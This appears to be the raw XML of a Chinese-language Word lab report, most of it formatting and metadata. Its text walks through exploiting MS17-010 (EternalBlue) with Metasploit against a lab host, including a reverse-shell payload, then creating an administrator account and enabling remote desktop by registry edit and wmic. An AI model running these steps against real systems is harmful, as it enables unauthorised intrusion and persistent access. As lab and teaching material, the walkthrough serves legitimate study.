        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>命令：msfconsole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4972050" cy="2838450"/>
            <wp:effectExtent l="0" t="0" r="6350" b="635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搜索永恒之蓝的漏洞攻击载荷</w:t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命令：search ms17-010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796925"/>
            <wp:effectExtent l="0" t="0" r="10795" b="317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选择攻击载荷</w:t>
      </w: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命令：use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit/windows/smb/ms17_010_eternalblue </w:t>
      </w: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5082540" cy="412750"/>
            <wp:effectExtent l="0" t="0" r="10160" b="635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设置发起攻击主机地址；设置被攻击主机地址；设置payload。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命令：set lhost 192.168.206.200 ；set rhosts 192.168.206.134；set payload generic/shell_reverse_tcp或：set payload windows/x64/meterpreter/reverse_tcp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4572000" cy="774700"/>
            <wp:effectExtent l="0" t="0" r="0" b="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发起攻击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命令：run/exploit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887345"/>
            <wp:effectExtent l="0" t="0" r="1270" b="825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看到了熟悉的界面，获取shell权限成功；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新建用户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命令：net user kali /add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更改用户密码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命令：net user kali Password01！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赋予管理员权限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net localgroup Administrators </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> /add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开启被攻击主机3389远程桌面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（注：使用于xp、win7）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ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f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（注：适用于2003）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开2003的3389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wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call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SetAllowTSConnections 1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查看端口开放状态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Netstat -ano | finstr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3389</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:bookmarkStart w:id="7" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="7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远程登陆测试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708400" cy="3841750"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350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3308350" cy="3689350"/>
            <wp:effectExtent l="0" t="0" r="6350" b="635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5271135" cy="2719070"/>
            <wp:effectExtent l="0" t="0" r="12065" b="1143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asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>攻击成功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550"/>
        <w:tab w:val="left" w:pos="5818"/>
      </w:tabs>
      <w:ind w:right="260" w:firstLine="480"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:color w:val="222A35" w:themeColor="text2" w:themeShade="80"/>
        <w:sz w:val="24"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="8497B0" w:themeColor="text2" w:themeTint="99"/>
        <w:sz w:val="24"/>
        <w:lang w:val="zh-CN"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="tx2">
              <w14:lumMod w14:val="60000"/>
              <w14:lumOff w14:val="40000"/>
            </w14:schemeClr>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="333F50" w:themeColor="text2" w:themeShade="BF"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="333F50" w:themeColor="text2" w:themeShade="BF"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:instrText xml:space="preserve">PAGE   \* MERGEFORMAT</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="333F50" w:themeColor="text2" w:themeShade="BF"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="333F50" w:themeColor="text2" w:themeShade="BF"/>
        <w:sz w:val="24"/>
        <w:lang w:val="zh-CN"/>
      </w:rPr>
      <w:t>23</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="333F50" w:themeColor="text2" w:themeShade="BF"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="333F50" w:themeColor="text2" w:themeShade="BF"/>
        <w:sz w:val="24"/>
        <w:lang w:val="zh-CN"/>
      </w:rPr>
      <w:t xml:space="preserve"> | </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="333F50" w:themeColor="text2" w:themeShade="BF"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="333F50" w:themeColor="text2" w:themeShade="BF"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:instrText xml:space="preserve">NUMPAGES  \* Arabic  \* MERGEFORMAT</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="333F50" w:themeColor="text2" w:themeShade="BF"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="333F50" w:themeColor="text2" w:themeShade="BF"/>
        <w:sz w:val="24"/>
        <w:lang w:val="zh-CN"/>
      </w:rPr>
      <w:t>23</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="333F50" w:themeColor="text2" w:themeShade="BF"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p>
    <w:pPr>
      <w:pStyle w:val="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CB2835"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="90CB2835"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="chineseCounting"/>
      <w:pStyle w:val="2"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1 "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1985"/>
        </w:tabs>
        <w:ind w:left="2410" w:firstLine="142"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
        </w:tabs>
        <w:ind w:left="567" w:hanging="567"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体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 w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="850" w:hanging="85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991" w:hanging="991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75" w:hanging="1275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58" w:hanging="1558"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="A246DDD1"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="A246DDD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48B"/>
    <w:rsid w:val="00073EAF"/>
    <w:rsid w:val="000911B7"/>
    <w:rsid w:val="000B05DB"/>
    <w:rsid w:val="0014292F"/>
    <w:rsid w:val="001872DB"/>
    <w:rsid w:val="001B1E2B"/>
    <w:rsid w:val="001B7D39"/>
    <w:rsid w:val="0020005C"/>
    <w:rsid w:val="002425B1"/>
    <w:rsid w:val="0024410D"/>
    <w:rsid w:val="002709D1"/>
    <w:rsid w:val="002868B7"/>
    <w:rsid w:val="002B28BE"/>
    <w:rsid w:val="002C3C3F"/>
    <w:rsid w:val="0030522C"/>
    <w:rsid w:val="00332379"/>
    <w:rsid w:val="00353108"/>
    <w:rsid w:val="00367858"/>
    <w:rsid w:val="0038573B"/>
    <w:rsid w:val="003860AB"/>
    <w:rsid w:val="00392948"/>
    <w:rsid w:val="003F2D9F"/>
    <w:rsid w:val="00417061"/>
    <w:rsid w:val="00423ED0"/>
    <w:rsid w:val="00425541"/>
    <w:rsid w:val="004409F6"/>
    <w:rsid w:val="00454D40"/>
    <w:rsid w:val="004F73E8"/>
    <w:rsid w:val="00531DCE"/>
    <w:rsid w:val="005659E4"/>
    <w:rsid w:val="00573A14"/>
    <w:rsid w:val="00593DCF"/>
    <w:rsid w:val="005C2732"/>
    <w:rsid w:val="006365C7"/>
    <w:rsid w:val="00652A2A"/>
    <w:rsid w:val="00682162"/>
    <w:rsid w:val="0068248B"/>
    <w:rsid w:val="00683509"/>
    <w:rsid w:val="006906F3"/>
    <w:rsid w:val="006D1F10"/>
    <w:rsid w:val="006E123C"/>
    <w:rsid w:val="00731113"/>
    <w:rsid w:val="007620CF"/>
    <w:rsid w:val="007B7B42"/>
    <w:rsid w:val="007E4FEE"/>
    <w:rsid w:val="008536C2"/>
    <w:rsid w:val="00875EAC"/>
    <w:rsid w:val="00895780"/>
    <w:rsid w:val="008B2088"/>
    <w:rsid w:val="008C7C3B"/>
    <w:rsid w:val="009438A6"/>
    <w:rsid w:val="009B4A91"/>
    <w:rsid w:val="00A031A2"/>
    <w:rsid w:val="00A34389"/>
    <w:rsid w:val="00A66139"/>
    <w:rsid w:val="00AB1111"/>
    <w:rsid w:val="00AD28E6"/>
    <w:rsid w:val="00B469D6"/>
    <w:rsid w:val="00B514B5"/>
    <w:rsid w:val="00B54B4C"/>
    <w:rsid w:val="00B775D0"/>
    <w:rsid w:val="00BB007D"/>
    <w:rsid w:val="00C63AB0"/>
    <w:rsid w:val="00D03499"/>
    <w:rsid w:val="00D06308"/>
    <w:rsid w:val="00D0636B"/>
    <w:rsid w:val="00D37528"/>
    <w:rsid w:val="00D5336F"/>
    <w:rsid w:val="00D7619C"/>
    <w:rsid w:val="00DA58F5"/>
    <w:rsid w:val="00DB25D0"/>
    <w:rsid w:val="00DC6297"/>
    <w:rsid w:val="00E14DF4"/>
    <w:rsid w:val="00E1627A"/>
    <w:rsid w:val="00EA00DB"/>
    <w:rsid w:val="00EF2523"/>
    <w:rsid w:val="00F406B1"/>
    <w:rsid w:val="00F64723"/>
    <w:rsid w:val="00FA6CF9"/>
    <w:rsid w:val="02D07577"/>
    <w:rsid w:val="093228D3"/>
    <w:rsid w:val="0B251738"/>
    <w:rsid w:val="0D641B20"/>
    <w:rsid w:val="0F311D11"/>
    <w:rsid w:val="1F9C18B8"/>
    <w:rsid w:val="2269672E"/>
    <w:rsid w:val="245F4555"/>
    <w:rsid w:val="38620A78"/>
    <w:rsid w:val="38AD59E8"/>
    <w:rsid w:val="3AA4012A"/>
    <w:rsid w:val="3BA8396B"/>
    <w:rsid w:val="3F4337B9"/>
    <w:rsid w:val="47CF67E9"/>
    <w:rsid w:val="4EA555AC"/>
    <w:rsid w:val="500761BD"/>
    <w:rsid w:val="51A55D5F"/>
    <w:rsid w:val="520A129B"/>
    <w:rsid w:val="53A60D2B"/>
    <w:rsid w:val="602E2C67"/>
    <w:rsid w:val="61B331FE"/>
    <w:rsid w:val="622902AE"/>
    <w:rsid w:val="63FB76B5"/>
    <w:rsid w:val="685C65DF"/>
    <w:rsid w:val="704231E1"/>
    <w:rsid w:val="718F07EA"/>
    <w:rsid w:val="7A7A16D1"/>
    <w:rsid w:val="7AF8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next w:val="1"/>
    <w:link w:val="16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="340" w:after="330" w:line="360" w:lineRule="auto"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA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9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="260" w:after="260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tabs>
        <w:tab w:val="left" w:pos="2450"/>
        <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
      </w:tabs>
      <w:ind w:left="1120" w:leftChars="400" w:firstLine="560"/>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="6">
    <w:name w:val="Date"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="17"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:left="100" w:leftChars="2500"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="7">
    <w:name w:val="footer"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="22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4">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="13"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="15">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="13"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="16">
    <w:name w:val="标题 1 字符"/>
    <w:basedOn w:val="13"/>
    <w:link w:val="2"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="17">
    <w:name w:val="日期 字符"/>
    <w:basedOn w:val="13"/>
    <w:link w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="18">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="34"/>
    <w:pPr>
      <w:ind w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="19">
    <w:name w:val="标题 3 字符"/>
    <w:basedOn w:val="13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paragraph" w:customStyle="1" w:styleId="20">
    <w:name w:val="List Paragraph1"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="420"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="21">
    <w:name w:val="页眉 字符"/>
    <w:basedOn w:val="13"/>
    <w:link w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="22">
    <w:name w:val="页脚 字符"/>
    <w:basedOn w:val="13"/>
    <w:link w:val="7"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="23">
    <w:name w:val="未处理的提及1"/>
    <w:basedOn w:val="1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4">
    <w:name w:val="未处理的提及2"/>
    <w:basedOn w:val="1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3318</Words>
  <Characters>18917</Characters>
  <Lines>157</Lines>
  <Paragraphs>44</Paragraphs>
  <TotalTime>100</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>22191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2020-01-08T10:40:00Z</dcterms:created>
  <dc:creator>ASUS</dc:creator>
  <cp:lastModifiedBy>Helte</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-07-06T09:55:53Z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